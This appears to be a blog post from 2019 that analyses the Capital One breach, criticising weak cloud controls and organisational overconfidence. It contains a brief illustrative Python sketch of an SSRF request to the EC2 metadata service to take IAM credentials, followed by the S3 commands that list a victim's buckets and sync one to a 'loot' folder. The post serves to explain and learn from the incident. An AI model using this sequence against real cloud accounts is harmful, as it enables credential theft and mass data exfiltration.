Earlier this week, on July 29, FBI agents arrested Paige Thompson (alias “erratic”) in connection with the theft of roughly 30 GB of Capital One credit application data from a rented cloud data server.
In a statement to the FBI, Capital One reported that an intruder executed a command that retrieved the security credentials for a web application firewall administrator account, used those credentials to list the names of data folders/buckets, and then to copy (sync) them to buckets controlled by the attacker. The incident appears to have affected approximately 100 million people in the United States and six million in Canada.
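The reported sequence maps onto a well-known cloud attack pattern: a server-side request forgery (SSRF) coaxes the application into querying the EC2 instance metadata service, which hands back temporary credentials for the instance’s IAM role, and those credentials then work from anywhere. A minimal sketch of the three steps, with every role and bucket name invented for illustration (this only constructs the requests and commands; it does not execute anything against AWS):

```python
# Hypothetical reconstruction of the reported three-step chain.
# All names below are placeholders, not Capital One's actual resources.

# The EC2 instance metadata service is always reachable at this link-local
# address from inside the instance:
METADATA = "http://169.254.169.254/latest/meta-data/iam/security-credentials"
ROLE = "example-waf-role"  # placeholder for the over-privileged WAF role

# Step 1: an SSRF-style request makes the server fetch its own role's
# temporary credentials (AccessKeyId, SecretAccessKey, session Token):
credential_request = f"{METADATA}/{ROLE}"

# Step 2: with those credentials exported into the attacker's environment,
# enumerate the account's storage buckets:
list_command = "aws s3 ls"

# Step 3: copy a target bucket's contents to attacker-controlled storage:
sync_command = "aws s3 sync s3://example-victim-bucket ./loot"

print(credential_request)
```

The key point is that the metadata service trusts any request originating from the instance, so an application that can be tricked into fetching attacker-supplied URLs becomes a credential proxy.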
If you just want a quick summary of the incident, try “For Big Banks, It’s an Endless Fight With Hackers” or “Capital One says data breach affected 100 million credit card applications.”
I just can’t resist offering some observations, speculation, and opinions on this topic.
Since as early as 2015, the Capital One CIO has hyped their being first to cloud, their cloud journey, and their cloud transformation, and has asserted that their customers’ data was more secure in the cloud than in their private data centers. Earlier this year the company argued that moving to AWS would “strengthen your security posture” and highlighted their ability to “reduce the impact of compliance on developers” (22:00) by using AWS security services and the network of AWS security partners; in their view, software engineers and security engineers “should be one in the same” (9:34).
I assume that this wasn’t an IT experiment, but an expression of a broader Capital One corporate culture, its values and ethics. I also assume that there was, or is, some breakdown in their engineering assumptions about how their cloud infrastructure and its operations worked. How does this happen? Given the information available to me today, I wonder about the role of malignant group-think and an echo chamber at work, or some shared madness gripping too many levels of Capital One management. Capital One must employ hordes of talented engineers, some of whom had to be sounding alarms about the risks associated with their execution of this ‘cloud first’ mission (I assume they attempted to communicate that it was leaving the company open to accusations of ‘mismanaging customer data,’ ‘inaccurate corporate communications,’ excessive risk appetite, and more). There were lots of elevated-risk decisions that managers at various levels needed to authorize…
Based on public information, it appears that:
- The sensitive data was stored in a way that allowed it to be read in clear text from the “local instance” (ineffective or absent encryption).
- The sensitive data was stored on a cloud version of a file system, not a database (weaker controls, weaker monitoring options).
- The sensitive data was gathered by Capital One starting in 2005, which suggests gaps in their data life-cycle management (ineffective or absent data life-cycle management controls).
- There were no effective alerts or alarms announcing unauthorized access to the sensitive data (ineffective or absent IAM monitoring/alerting/alarming).
- There were no effective alerts or alarms announcing ‘unexpected’ or out-of-specification traffic patterns (ineffective or absent data communications or data flow monitoring/alerting/alarming).
- There were no effective alerts or alarms announcing social media, forums, dark web, etc. chatter about threats to Capital One infrastructure/data/operations/etc. (ineffective or absent threat intelligence monitoring & analysis, and follow-on reporting/alerting/alarming).
- Capital One’s conscious program to “reduce the compliance burden that we put on our developers” (28:23) may have obscured architectural, design, and/or implementation weaknesses from Capital One developers (a lack of security transparency, possibly overconfidence that developers understood their risk management obligations, and possible weaknesses in their secure software program).
- Capital One ‘wrapped’ a gap in IAM vendor Sailpoint’s platform with custom integrations to AWS identity infrastructure (16:19) (potentially increasing the risk of misunderstanding or omission in this identity & access management ‘plumbing’).
- There may have been application vulnerabilities that permitted the execution of server side commands (ineffective input validation, scrubbing, etc. and possibly inappropriate application design, and possible weaknesses in their secure code review practices and secure software training).
- There may have been infrastructure configuration decisions that permitted elevated rights access to local instance meta-data (ineffective configuration engineering and/or implementation).
- There must be material gaps or weaknesses in Capital One’s architecture risk assessment practices, or in how and where those practices are applied; either way, they must have been incomplete, ineffective, or worse for a long time.
- And if this was the result of ‘designed-in’ or systemic weaknesses at Capital One, there seems to be room to question whether their SEC filings about the effectiveness of their controls are supported by the facts of their implementation and operational practices.
In almost any context this is a pretty damning list. Most of these are areas where global financial services enterprises are supposed to be experts.
Aren’t there also supposed to be internal systems in place to ensure that each financial services enterprise achieves risk-reasonable levels of excellence in each of the areas mentioned in the bullets above? And where were the regulations and regulators that play a role in assuring that this is the case?
How does an enormous, heavily-regulated financial services enterprise get into a situation like this? There is a lot of psychological research suggesting that overconfidence is a widespread cognitive bias and I’ve read, for example, that it underpins what is sometimes called ‘organizational hubris,’ which seems like a useful label here. The McCombs School of Business Ethics Unwrapped program defines ‘overconfidence bias’ as “the tendency people have to be more confident in their own abilities than is objectively reasonable.” That also seems like a theme applicable to this situation. Given my incomplete view of the facts, it seems like this may have been primarily a people problem, and only secondarily a technology problem. There is probably no simple answer…
Is the Capital One case unique? Could other financial services enterprises be on analogous journeys?
REFERENCES:
“Capital One Data Theft Impacts 106M People.” By Brian Krebs. https://krebsonsecurity.com/2019/07/capital-one-data-theft-impacts-106m-people/
“Why did we pick AWS for Capital One? We believe we can operate more securely in their cloud than in our own data centers.” By Rob Alexander, CIO, Capital One, https://aws.amazon.com/campaigns/cloud-transformation/capital-one/ and https://youtu.be/0E90-ExySb8?t=212
“For Big Banks, It’s an Endless Fight With Hackers.” By Stacy Cowley and Nicole Perlroth, 30 July 2019. https://www.nytimes.com/2019/07/30/business/bank-hacks-capital-one.html
“Capital One says data breach affected 100 million credit card applications.” By Devlin Barrett. https://www.washingtonpost.com/national-security/capital-one-data-breach-compromises-tens-of-millions-of-credit-card-applications-fbi-says/2019/07/29/…
“AWS re:Inforce 2019: Capital One Case Study: Addressing Compliance and Security within AWS (FND219)” https://youtu.be/HJjhfmcrq1s
“Frequently Asked Questions.” https://www.capitalone.com/facts2019/2/
Overconfidence Bias defined: https://ethicsunwrapped.utexas.edu/glossary/overconfidence-bias
Scholarly articles for cognitive bias overconfidence: https://scholar.google.com/scholar?hl=en&as_sdt=1,16&as_vis=1&q=cognitive+bias+overconfidence&scisbd=1
“How to Recognize (and Cure) Your Own Hubris.” By John Baldoni. https://hbr.org/2010/09/how-to-recognize-and-cure-your